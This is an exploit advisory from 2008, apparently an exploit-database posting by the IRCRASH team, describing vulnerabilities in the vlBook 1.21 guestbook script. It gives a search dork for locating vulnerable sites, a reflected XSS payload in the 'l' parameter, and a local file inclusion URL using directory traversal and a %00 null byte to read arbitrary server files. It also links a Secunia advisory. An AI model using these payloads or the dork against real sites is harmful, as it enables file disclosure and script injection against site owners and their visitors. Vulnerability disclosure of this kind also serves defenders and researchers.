vlBook 1.21 (XSS/LFI) Multiple Remote Vulnerabilities :: 2008-05-01
##################################################################################### #### vlBook 1.21 (ALL VERSION) #### #### Multiple Remote Vulnerabilities (LFI/XSS) #### ##################################################################################### # # #AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani) # #Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr ##################################################################################### # # #Script Download : http://home.vlab.info/vlbook_1.21.zip # # # #DORK : "Powered by vlBook 1.21" # # # ##################################################################################### # < XSS > # #XSS Address : http://example/?l=" <script>alert('xss')</script> # # # ##################################################################################### # < LFI > # #LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00 # # # ##################################################################################### # Site : Http://IRCRASH.COM # ################################ TNX GOD ############################################Download
http://secunia.com/advisories/30046